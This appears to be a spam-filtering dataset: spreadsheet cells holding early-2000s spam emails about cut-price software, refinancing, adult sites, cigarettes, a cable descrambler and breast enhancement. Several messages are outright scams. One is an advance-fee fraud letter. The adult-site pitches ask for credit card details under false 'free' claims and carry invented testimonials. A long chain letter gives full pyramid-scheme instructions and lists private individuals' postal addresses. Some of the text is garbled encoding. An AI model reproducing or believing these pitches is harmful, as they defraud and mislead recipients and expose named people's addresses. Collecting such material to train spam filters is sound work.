NortonSystemWorks
      2002 Professional
      Edition 
Made
      by the Creators of the #1 Anti-Virus Software on the Market!
This
      UNBEATABLE software suite comes with  EVERY
      program you'll  ever need to answer the problems or threats that your
      computer faces each day of it's Life!Included in this magnificent deal
      are the following programs:
Norton
      AntiVirusÃ¿FFFF99 2002 - THE #1
      ANTI-VIRUS PROTECION EVER!Norton UtilitiesÃ¿FFFF99 2002
      - DIAGNOSE ANY PROBLEM WITH YOUR
      SYSTEM!
Norton GhostÃ¿FFFF99 2002 - MAKES
      BACKING UP YOUR VALUABLE DATA EASY!
      Norton CleanSweepÃ¿FFFF99 2002 - CLEANS
      OUT EXCESS INTERNET FILE BUILDUP!
      Norton WinFaxÃ¿FFFF99 Basic - TURNS YOUR
      CPU INTO A FAX MACHINE!GoBackÃ¿FFFFAE 3 Personal - HELPS
      PREVENT YOU FROM MAKING ANY MISTAKES!
*ALL
      this has a retail price of $99.95*  Get it
      Now for ONLY $29.99!with
      FREE SHIPPING!
CLICK
      HERE to order NOW!
This Product is available NOW. When we
run out it's gone, so get it while it's HOT!
Â 
Â 
Your
      email address was obtained from an opt-in list. Opt-in IAO (Internet
      Advertising Organisation)Â  List
      Â Serial No. EGU601.Â Â If you wish to be unsubscribed from
      this list, please Click
      here. We do not condone spam in any shape or form. Thank You kindly
      for your cooperation.
</t>
  </si>
  <si>
    <t>*****Write down*****
Hello ,
It is time to refinance!Your credit does not matter, we can approve anyone.Now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Guaranteed!http://21377@www.top-lenders.com/appBest,
Top-LendersErase
http://21631@www.top-lenders.com/remove.html</t>
  </si>
  <si>
    <t xml:space="preserve"> ##################################################
#                                                #
#                 Adult Club                     #
#           Offers FREE Membership               #
#                                                #
##################################################&gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
&gt;&gt;&gt;&gt;&gt;  Your User Name And Password is.
&gt;&gt;&gt;&gt;&gt;  User Name: zzzz@spamassassin.taint.org
&gt;&gt;&gt;&gt;&gt;  Password: 15343 of the Best Adult Sites on the Internet for FREE!---------------------------------------NEWS 08/15/02
With just over 2.9 Million Members that signed up for FREE, Last month
there were 721,184 New
Members. Are you one of them yet???---------------------------------------Our Membership FAQQ. Why are you offering free access to 3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3 membership sites?
A. No just one to get access to all of them.Q. How do I get started?
A. Click on one of the following links below to become a member.- These are multi million dollar operations with policies and rules.
- Fill in the required info and they won't charge you for the Free pass!
- If you don't believe us, just read their terms and conditions.---------------------------new! &gt; Tilthy Teen Sluts (added 08-15-02)
The Ultimate XXX TEEN Site... ItÂ’s all for FREE!!
&gt;&gt;&gt; Click Here:
http://www.bozombo.com/filthyteensluts/index.php?affid=1534
AOL
Users Click Herenew! &gt; Lucky Amateur Wives (added 08-08-02)
Amateur Wives Giving it up... ItÂ’s all for FREE!!
http://www.bozombo.com/luckyamateurwives/index.php?affid=1534
AOL
Users Click Herenew! &gt; BOOB RANCH (added 08-01-02)
See The Worlds Best Boobs On The Net... ItÂ’s all for FREE!!
&gt;&gt;&gt; Click Here: http://www.bozombo.com/hugetits/index.php?affid=1534
AOL
Users Click Here--------------------------Jennifer Simpson, Miami, FL
Your FREE lifetime membership has entertained my boyfriend and I for
the last two years!  Your Adult Sites are the best on the net!Joe Morgan Manhattan, NY
Your live sex shows and live sex cams are unbelievable. The best part
about your porn sites, is that they're absolutely FREE!--------------------------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 http://greenzer.com/remove.php or AOL Users Click Here to be
removed from the list. Please accept our apologies if you have been sent
this email in error. We honor all removal requests.
 qvnckofayjfpfpsswkfvdrmcyljarjxw</t>
  </si>
  <si>
    <t>When America's top companies compete for your business, you win.In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easily...Compare your coverage...
$250,000... as low as $6.50 per month.
$500,000... as low as $9.50 per month.
$1,000,000... as low as $15.50 per month.http://getit.hostserve21.com/sure_quote/LF06-237600/Take a moment.
Let us show you that we are here to save time, and money.Receive up to 15 quotes in seconds.http://getit.hostserve21.com/sure_quote/LF06-237600/
Click here to delete your address from future updates.
http://getit.hostserve21.com/sure_quote/rm/</t>
  </si>
  <si>
    <t>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below:http://www.webdesignhq.com/omnivore/vlist/vlist.php?action=out&amp;address=Users@iiu.taint.org</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
&gt;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
&gt;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
&gt;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
&gt;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
&gt; ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
&gt;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 8,000 ï¿½ 50,000 ï¿½ï¿½ï¿½/ï¿½ï¿½ï¿½ï¿½ï¿½
&gt;
&gt;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ 2-3 ï¿½ï¿½ ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
&gt;
&gt;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½   http://www.zthefuture.com/advanced
&gt;ï¿½ï¿½ï¿½ï¿½   http://www.thaiworkathome.com/advanced
&gt;
&gt;
&gt;
&gt;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ CLICKï¿½ï¿½ï¿½ 
&gt;http://www.thaiworkathome.com/unsubscribe.php
</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</si>
  <si>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http://www.smokesdirect.com/?ID=2Best regards
Sales Department
Smokes Direct
Spain
xay2095811y-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</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</si>
  <si>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http://www.cheapsmoking.com/?ID=2Best regards
Sales Department
Cheap Smoking
Spain
xay1992361y</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</si>
  <si>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http://www.cheapsmoking.com/?ID=2Best regards
Sales Department
Cheap Smoking
Spain
xay1992391y</t>
  </si>
  <si>
    <t xml:space="preserve">OWOLABI &amp; ASSOCIATE,
FALOMO, IKOYI.
LAGOS - NIGERIA.
YOUR KIND ATTN.,RE: REQUEST FOR MUTUALLY BENEFITTING ENDEAVOUR.I humbly crave your indulgence in sending you this
mail, if the contents does not meet with your personal
and business ethics, I apologize in advance.I am Barrister Kola Owolabi( attorney at law), I
represent Alhaji Ishmaila Ibrahim Gwarzoâ€™s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benefit.I have been mandated by my client to source for a
foreign partner that can help him facilitate the
change of possession. The deposit certificate and the
code needed for the execution of this endeavor are in
my possession.The funds in question is USD17.6M (Seventeen Million, Six Hundred Thousand
United States dollars Only). Should this proposition be of interest to you, you can reach me through my e-mail address so that we can go through the rudiments of this endeavor.I remain most obliged.Barrister Kola Owolabi(JP).
Principal Partner. Owolabi &amp; Associates__________________________________________________________________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
</t>
  </si>
  <si>
    <t>Dear Sir / MadamIf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more???Visit our website at
http://www.cheapsmoking.com/?ID=2Best regards
Sales Department
Cheap Smoking
Spain
xay1992351y</t>
  </si>
  <si>
    <t>=================================Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 
1996.  Increase  your bust by 1 to 3 sizes within 30-60 
days and be all natural.  Click here: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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=ilug@linux.ie-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Dear Sir,I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honor.Kindly expedite action as we are behind schedule to
enable us include this transfer in the next batch
which would constitute the new quarter payments
for the 2002 financial year. Thank you and God bless.Dr James Alabi</t>
  </si>
  <si>
    <t>HELLO...By reading the short Summary just below, you
will see how you can learn new skills in communication,
do a direct marketing program on the internet, and at the
same time, earn $100,000 or more to enable you to
CHANGE YOUR LIFE!!!************SUMMARY***************************Just read this Summary, follow the actions that it advises,
and start earning some serious money.  You will learn new
skills in communications and how to market on the internet.
What a Deal!  Your total cash investment is just $50.00.Step 1.  If this is the first time you have seen this message,
and you have not joined in this program before, then
take out five US$10.00 bills (total $50 investment), and mail
out $10.00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$10.00 bill
inside the sheet of paper, insert the paper and $10.00 bill
into an envelope, address the envelope with the name and
address of the person whose name is shown under each
Guide below, and mail the envelope by first class or air
mail. Be sure to put enough postage stamps on the
envelopes.  No need to send by registered mail.LIST OF FIVE NAMES****************************
________________________________________________GUIDE# 1: "How to be A More Effective Public Speaker"
Order Guide #1 for US$10.00 CASH from: (In addition to
Guide #1, you will receive a valuable marketing Guide
"A Million Bucks From the Internet", free of charge)Derrick Nguyen	
9530 Whitmore St	
El Monte, CA 91733	
USA
________________________________________________GUIDE # 2: "How to Give a Business Presentation"
Order Guide # 2 for US$10.00 CASH from:Tim Fai
GPO Box 260
Macau (via Hong Kong)
________________________________________________GUIDE# 3: "How to Write More Effectively"
Order Guide # 3 for US$10.00 CASH from:Luis Pastor
Apartado 81
48080 Bilbao
Spain
________________________________________________GUIDE # 4: "What to do at a Social Function"
Order Guide # 4 for US$10.00 CASH from:Chester Waldvogel
11 Chestnut Way
Berlin, MD 21811
USA
________________________________________________GUIDE # 5: "How To Sharpen Your Mind"
Order Guide # 5 for US$10.00 CASH from:J. Siden
Krondikesvagen 54 A
83147 Ostersund
Sweden
________________________________________________
END OF LIST OF FIVE NAMES*********************Step 2.  These Guides will be emailed to you.  Save these
Guides on your computer's hard disk as other people will be
ordering these Guides from you, paying you for them and
you will need to email the Guides to the new buyers.Step 3.  From the list of names above, delete the name and
address of the person shown under GUIDE#5, and replace that
slot with the name and address of the person from GUIDE #4's
slot.  Be sure to copy the name and address exactly as shown.
Check the address again.Step 4.  Delete name and address under GUIDE #4, and
replace with the name and address from GUIDE #3's slot.Step 5.  Delete name and address under GUIDE #3, and
replace with the name and address from  GUIDE#2's slot.Step 6.  Delete name and address under GUIDE #2, and
replace with the name and address from GUIDE #1's slot.Step 7.  Delete name and address under GUIDE #1, and
replace with YOUR OWN NAME AND ADDRESS. This
step is how your own name and address is entered into the
list of names to receive orders for the Guides. Eventually,
your own name will go down the list of names until you have
reached GUIDE #5, and then be dropped from the list. The
key point is that the number of people ordering Guides from
you will grow larger the lower down the list your name goes.Step 8.  Once you have completed this new list, send out
this new email (which shows your name under GUIDE #1) to
as many email addresses as possible, as many as 100,000
emails or even more.  The greater the number of mailings
you make, potentially the greater the number of people who
will order the GUIDE #1 from you.  These people will then
make new emails to send out to their addresses with the email
showing your name under GUIDE #2, and so on.This is all you need to do.  If you wish to read the rest of
this email message, then do so.  If not, just do the 8 steps
shown above. Remember, the key point is to send out as
many emails as possible in step 8, and to encourage and help
those who purchase the Guides from you to send out
emails of their own.Do NOT change anything other than what is instructed.
Because if you do, it will not work for you.  Your immediate
reaction might be: Why not replace all the names on the list
with the names of your spouse, kids, relatives, and friends.
That might seem to you like a clever move because new
buyers will be sending their money to these people.  But
that move is the exact opposite of what is to your benefit.
What will benefit you most is having people who will send
out emails, seek new buyers, and provide assistance to new
buyers. If the people you slip into that list aren't going to
be sending new emails, you're only hurting yourself by
effectively closing down the program with your name on
top of the list of the names that you have inserted.  There
wouldn't be new buyers coming in. So, your sly maneuver
will gain you exactly zero!  Furthermore, if you have done
the work, and your name has worked its way to further
down the list, by then you deserve the rewards and
earnings from that effort, and it would be unethical for
anyone to remove your name for whatever reason.  Don't
do it to others. Remember, honesty reaps the reward!!!You may have a concern that after sending the total $50 to
the five people on the list that one of the people will just
take your money, and not send you the Guide.  Well, rest
assured.  As we said above, it's to our benefit to have you
as a satisfied buyer who will actively send out emails to find
new buyers.  So don't think the people on the list will try to
cheat you or to "stiff" you for $10.00.  The people on the list
would rather have you working hard because your effort will
benefit them as well as you.  Later on, when other buyers send
you the order to buy the Guides, fulfill your end of the deal
by sending the ordered Guide to the buyer.  Don't cheat.
Provide efficient and honest service and we will all benefit.
******END OF SUMMARY************************=======REST OF MESSAGE======================With easy-to-use email tools and opt-in email, success in
this business is now well within the capabilities of ordinary
people who may not have done any internet marketing before.
And the earnings potential is staggering!READ THIS EMAIL TO THE END! -
follow what it says  - and you will not worry whether a
RECESSION is coming or not, or whether or not you can
afford to buy that new car or home that you have been
looking for.  Yes, I know what you are thinking. I never
responded to one of these before either. One day though,
something made me feel: "You use $50 going to a movie
for 2 hours with your spouse, friend, or child, plus a simple
meat at a restaurant.  Why the heck not?"  No matter where
you believe those "feelings" came from, I thank every day
that feeling came over me.I cannot imagine where I would be or what I would be doing
had I not. Read on. It works.  And when you read the Guides,
YouÂ’ll learn how to become a more effective communicator.
What can be better?  A way to improve your self-image and
confidence and at the same time have the potential to recover
your investment and make some good money: making over
half a million dollars every 4 to 5 months from your home.
If you work on this program, you will learn a lot about direct
marketing on the internet.  If you believe direct marketing
via the internet is the way sales and marketing will be done
in the future, then the experience you will gain here could
be a real boost in your work career, possibly even providing
a new career for you.= PRINT THIS MESSAGE FOR FUTURE REFERENCE =If you want to make serious money, read this message until
you understand it completely and feel confident to follow
through on what it advises.FOLLOW THE SIMPLE INSTRUCTION ABOVE AND
YOUR FINANCIAL DREAMS CAN COME TRUE!Remember, this method has been tested, and if you alter it,
it will NOT work!  This IS a legitimate BUSINESS. You
are offering a product for sale to a buyer. Treat it as such
and you can see money coming to you  in a reasonable period
of time, depending on the collective efforts of yourself and
the others on the list of five.===========================================
*** Take this entire email, with the modified list of names,
and save it on your computer. DO NOT MAKE ANY OTHER
CHANGES.  There are 2 methods to get this venture going:METHOD # 1: BY SENDING BULK EMAIL LEGALLY
===========================================Let's say that you start small, to see how it goes, and that
you and those involved send out only 5,000 emails each.
Let's also assume that the mailing receives only a 0.1%
(1/10 of 1%) response (the response could be much better
but let's just say it is only 0.1%). Also many people will
send out hundreds of thousands of emails instead of only
5,000 each.Out of your 5,000 emails and a 0.1% response, that is only
5 orders for Guide # 1. Those 5 people who responded also
send out 5,000 emails each for a total of 25,000. Out of
those 25,000 emails only 0.1% responded with orders.
That's 25 people who responded and ordered Guide # 2.Those 25 people mail out 5,000 e-mails each for a total of
125,000 emails. The 0.1% response to that is 125 orders
for Guide # 3. Those 125 people send 5,000 emails each
for a total of 625,000 emails sent out. The 0.1% response
is 625 orders for Guide # 4.Those 625 people send out 5,000 emails each for a total
of 3,125,000 emails. The 0.1% response to that is  3,125
orders for Guide # 5, or $31,250 at $10 per Guide.  This
may seem a small amount to you, but remember we used a
very low response rate with a small number of emails being
sent out.  See what happens if you can get the response rate
up just slightly.If Response Rate is 0.1%, income from Guides #1 - #5 is:
$50+250+1,250+6,250+31,250 = $39,050 (as above)If Response Rate is 0.15%, income from Guides #1 - #5 is:
$75+560+4,220+31,640+237,300 = $273,795If Response Rate is 0.2%, income from Guides #1 - #5 is:
$100+1,000+10,000+100,000+1,000,000 = $1,111,100Dare to think for a moment what would happen if everyone
or half or even one 4th of those people mailed 100,000
emails each or more?  From the example above, you can see
the power of leveraging, that is, how much greater is the
amount of money from a small increase in the response rate.There are over 200 million people on the internet worldwide
and counting, with thousands more coming online every day.METHOD # 2: PLACING FREE ADS ON THE INTERNET
===========================================Advertising on the net is very, very inexpensive and there are
Many FREE places to advertise. Placing a lot of free ads on
the internet will get a response. We strongly suggest you start
with  Method # 1 and add METHOD # 2 as you go along.
For every $10 you receive, all you must do is email the
Guide the buyer ordered. Always provide same day service.The people you buy these Guides from will assist and advise
you how to get the large number of email addresses that
you need to send the new email containing your name and
address.  In return, when others buy the Guides from you,
you also should help those buyers to resell the Guides to
their email addresses.  This will benefit you because your
name would be further down the list, and their new buyers
will buy from you.  This is no different than "customer
service" in the retail or the  "bricks and mortars" business.===========AVAILABLE GUIDES ==============
The reason for the "cash" is not because this is illegal or
somehow  "wrong". It is simply about time. Time for checks
or credit cards to be cleared or approved, etc. Concealing it
is simply so no one can SEE there is money in the envelope
and steal it before it gets to you.ORDER EACH GUIDE BY ITS NUMBER &amp; NAME ONLY.
Always send a single $10 bill (U.S. CURRENCY) for each
Guide.  Checks NOT accepted. Make sure the cash is hidden
by wrapping it in at least 2 sheets of paper. On one of
those sheets of paper, write the NUMBER &amp; the NAME
of the Guide you are ordering, YOUR EMAIL ADDRESS
and your name and postal address.  Be sure to address the
envelope correctly and put the proper amount of stamps to
mail the envelope.PLACE YOUR ORDER FOR THESE GUIDES NOW
FROM THE NAME AND ADDRESS LIST SHOWN
AT THE BEGINNING OF THIS EMAIL
________________________________________________
YOUR SUCCESS GUIDELINES=== If you do not receive at least 10 orders for GUIDE #1
within 2 weeks, continue sending emails until you do.=== Two to three weeks after you receive 10 orders,
you should receive 100 orders or more for GUIDE #2. If
not, continue advertising or sending emails until you do.Once you have received 100 or more orders for GUIDE # 2,
YOU CAN SEE THE PROGRAM IS WORKING, and
cash should continue coming in! THIS IS IMPORTANT
TO REMEMBER:  Continue to assist new buyers with advice
and instruction on how to send out more emails. You can
KEEP TRACK of progress by noting which guides people
are ordering from you. IF YOU WANT TO GENERATE
MORE INCOME SEND ANOTHER BATCH OF EMAILS
AND START THE WHOLE PROCESS AGAIN.
There is NO LIMIT to the income you can generate !!!
===========================================
A NOTE FROM THE ORIGINATOR OF THIS PROGRAM:
You have just received information that can give you
financial freedom to really change your life, but I don't
wish to kid you:  This requires A BIT OF EFFORT. You
can make more money in the next few weeks and months
than you have ever imagined. Follow the program
EXACTLY AS INSTRUCTED.Remember to email the revised copy of this email after you
have put your name and address in GUIDE#1 and moved
others to #2 .....# 5 slots as instructed above. One of the
people you send this to may send out 100,000 or more
emails and your name will be on every one of them.
Remember, the more you send out the more potential
buyers you will reach.IT IS UP TO YOU!  ORDER THE GUIDES NOW AND
EMBARK ON THE ROAD TO FINANCIAL SECURITY!Upon your purchase of any GUIDE #1 through #5, the
Copyright owner assigns to you two important rights:
(1) The right to resell and to distribute via the internet the
GUIDE that you have purchased, and (2) the right to assign
to your buyer of the GUIDE, the further right for your buyer
to resell that GUIDE.  Included in your purchase of Guide #1
is a valuable report on how to market on the Internet. It's
free of charge and will give you the tools you need.The right to print any of the material contained in the GUIDES
is reserved exclusively for the copyright owner.  Your right to
resell and to distribute copies of the GUIDE applies only to the
internet and/or world wide web via electronic distribution.
YOU MAY NOT PRINT OUT THE GUIDES TO SELL OR
DISTRIBUTE IN ANY WAY.  You may print a copy of the
Guides for your own personal use to enhance your
communication skills.===========================================* This message is not intended for residents of localities that
have legal ordinances prohibiting engaging in such programs.
Screening of addresses has been done to the best of our ability.This message is only being sent once to recipients and thus
is no need to remove your email address from our mailing
list.  You will not be receiving further emails with this message.iangxsifpkvgobwlxwhvvxfs</t>
  </si>
  <si>
    <t xml:space="preserve">
Hot Tawnee the Internet Sensation is ready to bare all for 
you.Looking at those firm tits and creamy soft 
thighs you can't help but get an instant erection. Now Tawnee's Sister 
Tori joined in. Both are sweet little honeys that love to show you what a good 
time is all about!
Click here To Visit TawneeStone.com 
          where you will see both posing for you in many erotic ways
Â THIS 
        EMAIL WAS NOT SENT UNSOLICITED. YOU HAVE SUBSCRIBED TO RECEIVE OUR MAILING. 
        IF YOU WISH TO DISCONTINUE SIMPLY REPLY TO THIS EMAIL WITH "REMOVE" 
        IN SUBJECT. WE ARE SORRY FOR ANY INCONVENIENCE.  </t>
  </si>
  <si>
    <t>HTML&gt;
Â Â Â Â Â Â Â Â Â Â Â Â      
Ä°NTERNETTE KENDÄ°NÄ°ZÄ° DAHA Ä°YÄ° HÄ°SSEDECEKSÄ°NÄ°Z.
	  Ä°NGÄ°LÄ°ZCE WEB SAYFALARININ TÃœRKÃ‡E'YE Ã‡EVÄ°RÄ° YAZILIMI
	    $ 39+KDV 
 Ä°NGÄ°LÄ°ZCE'DEN TÃœRKÃ‡E'YE BÄ°LGÄ°SAYAR DESTEKLÄ°
	    METÄ°N Ã‡EVÄ°RÄ° YAZILIMI  
	 (MS-WORD ALTINDA KULLANIM, TÃœM WINDOWS VERSÄ°YONLARI Ä°LE UYUMLU)
	   $ 69+KDV Ä°KÄ° YAZILIM Â  BÄ°RLÄ°KTE 
$ 
  89+KDVAyrÄ±ntÄ±lÄ± Bilgi 
      Ä°Ã§inÂ    tÄ±klayÄ±n 
      Â Â Â Â Â Â Â Â Â Â Â       
      Â  
BÄ°LSAG Ltd.
AHMET MÄ°THAT 
      EFENDÄ° SOK. 22/1 Ã‡ANKAYA 06700 / ANKARA /
Tlf: 0312. 439 2850/ Fax: 0312. 439 9347bilsag@msn.comÂ 
Â E-posta adres listemizden Ã§Ä±kmak iÃ§inÃ‡IKAR tuÅŸuna basÄ±nÄ±zBu elektronik posta: sitescooper-talk@example.sourceforge.net e gÃ¶nderilmiÅŸtir-------------------------------------------------------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</si>
  <si>
    <t>Email marketing works!  There's no way around it.
No other medium let's you share your offer with more 
people for less than the cost of a small classified ad.Get access to our targeted email list exchange where 
our members can exchange their old targeted email lists for new ones.Get access to over 1 million fresh general emails every week.We offer all the services above for free.Buyers are out there, marketing is the key.
Signup today at http://68.62.73.31
Limited membershipThis is a one time message, you will not be emailed again.</t>
  </si>
  <si>
    <t xml:space="preserve">
Copyright 2002 - All rights reservedIf you would no longer like us
to contact you or feel that you havereceived this email in error,
please click here
to unsubscribe.
</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</si>
  <si>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Â· $50 Deposit Bonus! - 100% bonus!
  Â· Daily High Hand - $250 Daily.
  Â· Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added
daily.
  Â· Tournaments - Multiplayer shootouts.
wish not to received any further e-mail from us please click
http://www.centralremovalservice.com/cgi-bin/poker-remove.cgi
(K3)8456DyGH8-805KZkP1399PLHN9-156cgkc0858xxnWl40
</t>
  </si>
  <si>
    <t>=================================Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 
1996.  Increase  your bust by 1 to 3 sizes within 30-60 
days and be all natural.  Click here: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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=zzzz@netcomuk.co.uk</t>
  </si>
  <si>
    <t>1) Join the Web's Hottest &amp; Fastest Growing Community
http://www.adclick.ws/p.cfm?o=259&amp;s=pk0072) Guaranteed to lose 10-12 lbs in 30 days
Slim Patch - Weight Loss Patches
http://www.adclick.ws/p.cfm?o=249&amp;s=pk0073) Get the Child Support You Deserve - Free Legal Advice
http://www.adclick.ws/p.cfm?o=245&amp;s=pk0024) Fight The Risk of Cancer - Save Your Lungs
http://www.adclick.ws/p.cfm?o=315&amp;s=pk0075) Start Your Online Private Photo Album 
http://www.adclick.ws/p.cfm?o=285&amp;s=pk007Have a Wonderful Day,
Offer Manager
PrizeMama
If you wish to leave this list please use the link below.
http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417</t>
  </si>
  <si>
    <t>=================================Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 
1996.  Increase  your bust by 1 to 3 sizes within 30-60 
days and be all natural.  Click here:
http://202.101.163.34:81/li/dws8848/Absolutely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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=zzzz@spamassassin.taint.org</t>
  </si>
  <si>
    <t>###################################  FREE Adult Lifetime Membership
      Limited Time Offer!!!###################################YOUR INSTANT ACCESS PASSWORD
LOGIN NAME:   zzzz@spamassassin.taint.org 
PASSWORD:     AcKWGy4L5 of the Best Adult Sites on the Internet for FREE!---------------------------NEWS 08/25/02
Over 3.1 Million Members have signed up for FREE, Last month 229,947
New Members signed up for Free with the limited time offer.
Are you a FREE Member yet???---------------------------Our Membership FAQQ. Why are you offering free access to 5 adult membership sites for free?A. We have advertisers that pay us for ad space so you don't have to
pay for a membership.Q. Is it true that your membership is Free for life?
A. Absolutely, you'll never have to pay a cent the advertisers do.Q. Do I have to sign up for all 5 FREE membership sites?
A. No, just one to get access to all of them.Q. Why do I have to give my Credit Card Information?
A. It's for age verification purposes only and you will not be charged.
   If you don't believe us, just read their terms and conditions.Q. How do I get started?
A. Click on one of the links below to become a Free member.---------------------------# 5. &gt; Adults Farm
http://80.71.66.8/farm/?aid=993751
Girls and Animals Getting Freaky....FREE Lifetime Membership!!# 4. &gt; Sexy Celebes
http://80.71.66.8/celebst/?aid=993751
Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!# 3. &gt; Play House Porn
http://80.71.66.8/play/?aid=993751
Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!# 2. &gt; Lesbian Lace
http://80.71.66.8/lesbian/?aid=993751
Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!# 1. &gt; Teen Sex Fantasies
http://80.71.66.8/teen/?aid=993751
Teen Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!--------------------------Jennifer Simpson, Miami, FL
Your FREE lifetime membership has entertained my boyfriend and I for
the last two years!  Your Adult Sites are the best on the net!Joe Morgan Manhattan, NY
Your live sex shows and live sex cams are unbelievable. The best part
about your porn sites, is that they're absolutely FREE!--------------------------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removal.This e-mail is sent in compliance with the Information Exchange
Promotion and Privacy Protection Act. section 50 marked as
'Advertisement' with valid 'removal' instruction.tkuejsrfkmtpfwldpnauksv</t>
  </si>
  <si>
    <t xml:space="preserve">Digital Publishing Tools - Free Software Alert!
Publish Like a Professional with Digital Publishing ToolsEasily Create Professional:
eBooks
eBrochures
eCatalogs
Resumes
Newsletters
Presentations
Magazines
Photo Albums
Invitations
Much, much more
Save MONEY! - Save TreesSave on Printing, Postage and Advertising CostsDIGITAL PUBLISHING TOOLS
DOWNLOAD NEW FREE Version NOW!
*Limited Time Offer
Choose from these
Display Styles:
3D Page Turn
Slide Show
Sweep/Wipe
Embed hyperlinks and Link to anywhere Online, such as your Website, Order Page or Contact Form.
Distribute via Floppy, CD-ROM, E-Mail or Online.Take your Marketing to the Next Level!For More Info, Samples or a FREE Download, click the appropriate link to the right! Â 
Server demand is extremely high for this limited time Free Software offer. Â 
Please try these links periodically if a site seems slow or unreachable.
WEBSITE 1
WEBSITE 2
WEBSITE 3If you wish to be removed from our mailing list, please cick the Unsubscribe button
 Â 
Copyright Â© 2002 - Affiliate ID #1269
*FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.
</t>
  </si>
  <si>
    <t>===================================================================Now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http://marketing-fashion.com/user0201/index.asp?Afft=QM3====================================================================To Unsubscribe: http://marketing-fashion.com/light/watch.asp</t>
  </si>
  <si>
    <t>Legal TV DescarmblerWant to watch Sporting Events?--Movies?--Pay-Per-View?? 
You can assemble from electronic store parts for about $12.00.
We Send You:
E-Z To follow Assembly Instructions
E-Z To read Original Drawings.
Electronic parts lists.PLUS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money.ORDERING INFORMATION ACT WITHIN THE NEXT 7 DAYS AND RECEIVE TWO FREE BONUSES!!THE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build.THE FREE BONUSES ALONE ARE WORTH ACTING NOW! 
THE CABLE DESCRAMBLER KIT COMES WITH A THIRTY DAY
MONEY BACK GUARANTEE! IF YOUR NOT COMPLETELY SATISFIED,
SEND THE CABLE DESCRAMBLER KIT BACK AND YOU KEEP
THE BONUSES FOR FREE. YOU HAVE NOTHING TO LOSE!!ACT NOW AND SAVE!!SIMPLY SEND $14.95, THAT'S ONLY $14.95 BUT YOU MUST 
ORDER WITHIN 7 DAYS FOR THIS SPECIAL PRICE!!!
SEND $14.95 Add $3.05 shipping/handling TOTAL $18.00 CHECK OR, MONEY ORDER, USD ONLY Foreign orders
must send payment in USD, Drawn on a USA Bank ONLY...
*******************NO EXCEPTIONS*********************                                   $18.00
